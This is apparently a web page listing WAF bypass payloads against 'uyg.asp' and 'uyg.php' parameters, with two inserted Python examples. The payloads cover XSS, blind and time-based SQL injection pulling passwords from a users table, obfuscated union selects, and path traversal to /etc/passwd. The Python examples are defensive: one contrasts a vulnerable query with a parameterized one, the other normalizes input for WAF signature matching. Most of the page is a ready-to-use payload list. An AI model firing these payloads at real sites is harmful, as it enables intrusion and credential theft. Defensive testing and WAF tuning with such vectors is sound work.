
SQL injection and XSS WAF bypass test vectors

Date: 2022-03-10 18:08

uyg.asp?id=onError="javascript:decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;

uyg.asp?id=<isindex type=image src=1 onerror=alert(1)>
uyg.asp?id=<isindex action=javascript:alert(1) type=image>
uyg.asp?id=<img src=x:alert(alt) onerror=eval(src) alt=0>
uyg.asp?id=<meta />
uyg.asp?id=<!</textarea <body onload='alert(1)'>
uyg.asp?id=</ style=?=-=expression\28write(12345)\29>
uyg.asp?id=<script>document.write(1)</script>
uyg.asp?id=<img <iframe ="1" onerror="alert(1)">
uyg.asp?id=<script<{alert(1)}/></script>
uyg.asp?id=">alert(String.fromCharCode(88,83,83));
uyg.asp?id=</XSS/*-*/STYLE=xss:e/**/xpression(alert(1))>
uyg.asp?id=<//STYLE=x:e/**/xpression(alert('xss'))>
uyg.asp?id=<object+data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

7. Blind injection
uyg.asp?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74--
uyg.asp?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74--
uyg.asp?id=1+and+ascii('a')=97
uyg.asp?id=1+and+hex('a')=61
uyg.asp?id=ord('a') = 97
uyg.asp?id=if(substring(USER(),1,4)='root',BENCHMARK(100000000,RAND()),1)--
uyg.asp?id=if(substring(USER(),1,4)='root',SLEEP(5),1)--
uyg.asp?id=123' and (select pass from users limit 1)='pass--

8. Other injection
uyg.asp?id=123+AND+1=1
uyg.asp?id=123+&&+1=1
uyg.asp?id='='
uyg.asp?id=123+AND+md5('a')!= md5('A')
uyg.asp?id=123+and+len(@@version)>1
uyg.asp?id=1'||1='1
uyg.asp?id=123'+like+'123
uyg.asp?id=123'+not+like+'1234
uyg.asp?id='aaa'<>'bbb'

uyg.asp?id=123+1-1 (id=123)
uyg.asp?id=123+1 (id=124)
uyg.asp?id=123+len(1234)-len(123) (id=124)
uyg.asp?id=123+len(@@server)-len(@@server)
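The arithmetic vectors just listed (id=123+1-1 returning the row for 123, id=123+1 returning the row for 124) only work when the parameter is pasted into the SQL text. The following Python example, added here and not part of the original post, runs a few of these values against a constructed in-memory SQLite table through a string-concatenated query and through a parameterized one, and phrases the page's own "id=123+1 behaves like id=124" observation as a regression test you can run against your own data-access layer. Table, row values and function names are my own.

```python
"""Added example (not from the original page): the same id lookup done the
vulnerable way and the safe way, exercised with the vectors listed above.
Table, rows and function names are constructed for this example."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample table: three rows with adjacent ids.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO items VALUES (?, ?)",
        [(122, "alpha"), (123, "bravo"), (124, "charlie")],
    )
    return conn


def lookup_concatenated(conn: sqlite3.Connection, raw_id: str) -> list:
    # VULNERABLE: the request parameter becomes part of the SQL text, so the
    # database evaluates whatever expression it contains (123+1 -> 124,
    # "123 AND 1=1" -> a boolean probe, and so on).
    sql = f"SELECT id, name FROM items WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, raw_id: str) -> list:
    # SAFE: validate the type first, then bind the value. Even without the
    # int() check, a bound value is data and is never parsed as SQL.
    try:
        item_id = int(raw_id)
    except ValueError:
        return []  # "123+1", "123 AND 1=1", "'='" are rejected outright
    return conn.execute(
        "SELECT id, name FROM items WHERE id = ?", (item_id,)
    ).fetchall()


def evaluates_arithmetic(conn: sqlite3.Connection, lookup) -> bool:
    # The check the page's annotations describe, as a regression test for your
    # own code: if id=123+1 returns the same row as id=124 (and not the row
    # for 123), the parameter is being evaluated as SQL.
    plus_one = lookup(conn, "123+1")
    return plus_one == lookup(conn, "124") and plus_one != lookup(conn, "123")


if __name__ == "__main__":
    db = make_db()
    for vector in ["123", "123+1-1", "123+1", "123 AND 1=1", "123 AND 1=2"]:
        print(f"{vector!r:16} concat={lookup_concatenated(db, vector)} "
              f"bound={lookup_parameterized(db, vector)}")
    print("concatenated evaluates arithmetic:",
          evaluates_arithmetic(db, lookup_concatenated))
    print("parameterized evaluates arithmetic:",
          evaluates_arithmetic(db, lookup_parameterized))
```

The concatenated lookup returns the row for 123 on "123+1-1" and the row for 124 on "123+1", exactly the behaviour the annotations above describe; the parameterized lookup returns nothing for either, because the value is rejected as a non-integer before it ever reaches the query, and a bound value could not change the query's shape even if it were accepted.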

uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1/*union*/union/*select*/select+1,2,3/*
uyg.php?id=1%2520union%2520select%25201,2,3/*
uyg.php?id=1%0Aunion%0Aselect%0A1,2,3/*
uyg.php?id=1/**/union%a0select/**/1,pass,3`a`from`users`
uyg.php?id=(0)union(select(table_schema),table_name,(0)from(information_schema.tables)having((table_schema)like(0x74657374)&&(table_name)!=(0x7573657273)))#

uyg.php?id=union(select(version()))--

uyg.php?id=123/*! union all select version() */--
uyg.php?id=123/*!or*/1=1;

uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1+union+select+1,2,3--
uyg.php?id=1+union+select+1,2,3#
uyg.php?id=1+union+select+1,2,3;%00
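The union vectors above all rely on the same trick: the keywords are present, but they are pulled apart by double percent-encoding (%2520), by %0A or %a0 in place of spaces, by inline /**/ comments, by MySQL versioned /*! */ comments (whose body MySQL executes), or by a trailing %00. A filter that matches keywords on the raw request text misses them; one that normalizes first does not. The following Python example, added here and not part of the original post, shows that normalization and runs two simple signatures over the vectors listed above plus two benign values. The signature names, function names and the benign samples are my own.

```python
"""Added example (not from the original page): WAF-side normalization of the
union/obfuscation vectors listed above, followed by signature matching.
Signature names, function names and benign samples are constructed."""
import re
from urllib.parse import unquote_to_bytes


def percent_decode_fully(value: str, max_rounds: int = 5) -> str:
    # Decode until the value stops changing (bounded), so %2520 -> %20 -> ' '.
    # A gateway should decode only as many layers as the backend stack will;
    # this decodes until stable because the detector cannot know that depth.
    data = value.replace("+", " ").encode("latin-1", errors="replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    # latin-1 keeps raw bytes such as %a0 (a whitespace byte for MySQL) as one char
    return data.decode("latin-1")


_VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # MySQL executes the body
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)            # ordinary comment: drop
_OPEN_COMMENT = re.compile(r"/\*.*$", re.S)                # unterminated trailing /*


def normalize_sql_param(value: str) -> str:
    text = percent_decode_fully(value)
    text = _VERSIONED_COMMENT.sub(r" \1 ", text)   # keep what MySQL would run
    text = _BLOCK_COMMENT.sub(" ", text)
    text = _OPEN_COMMENT.sub(" ", text)
    text = text.replace("\x00", "")                # %00 truncation byte
    # \s matches \n, \t and U+00A0, so %0A / %a0 separators collapse to a space
    text = re.sub(r"\s+", " ", text)
    return text.strip().lower()


SIGNATURES = {
    # "union select", "union(select", "union all select" after normalization
    "union-select": re.compile(r"\bunion\b\W*(?:(?:all|distinct)\W+)?select\b"),
    # "or 1=1" / "and 2=2": same number on both sides of the comparison
    "tautology": re.compile(r"\b(?:or|and)\b\s*(\d+)\s*=\s*\1\b"),
}


def inspect_param(value: str) -> dict:
    normalized = normalize_sql_param(value)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(normalized)]
    return {"normalized": normalized, "hits": hits}


# Constructed inputs: id= values from the vectors above, then two benign values.
SAMPLES = [
    "1+union+select+1,2,3/*",
    "1/*union*/union/*select*/select+1,2,3/*",
    "1%2520union%2520select%25201,2,3/*",
    "1%0Aunion%0Aselect%0A1,2,3/*",
    "1/**/union%a0select/**/1,pass,3`a`from`users`",
    "(0)union(select(table_schema),table_name,(0)from(information_schema.tables)"
    "having((table_schema)like(0x74657374)&&(table_name)!=(0x7573657273)))#",
    "union(select(version()))--",
    "123/*! union all select version() */--",
    "123/*!or*/1=1;",
    "1+union+select+1,2,3;%00",
    "123",                    # benign
    "union station select",   # benign: the words occur, the shape does not
]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = inspect_param(sample)
        print(f"{result['hits'] or ['-']!s:18} {result['normalized']}")
```

Every vector in the list ends up as plain "union select" (or "or 1=1") after normalization and is caught by a signature that would have missed the raw form; the two benign values are not flagged. The repeated decoding is the part to tune for a real deployment: decoding more layers than the application does creates false positives on inputs that legitimately contain "%25".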

uyg.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%00TESTTEST%3E
uyg.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%20TESTTEST%3E
uyg.php?id=";eval(unescape(location))//#%0Aalert(0)
uyg.php?file=../../../../../etc/passwd/////[…]/////
uyg.php?file=../../../../../etc/passwd//////////////
uyg.php?file=.//././/././/./boot.ini
uyg.php?id%00TESTTEST=1+union+select+1,2,3
uyg.php?id%20TESTTEST=1+union+select+1,2,3
uyg.php?id=1234&"><script>alert(1)</script>=1234
uyg.php?id=%00><script>alert(123)</script>

9. URL rewriting
http://localhost/uyg/id/123+or+1=1/tp/456
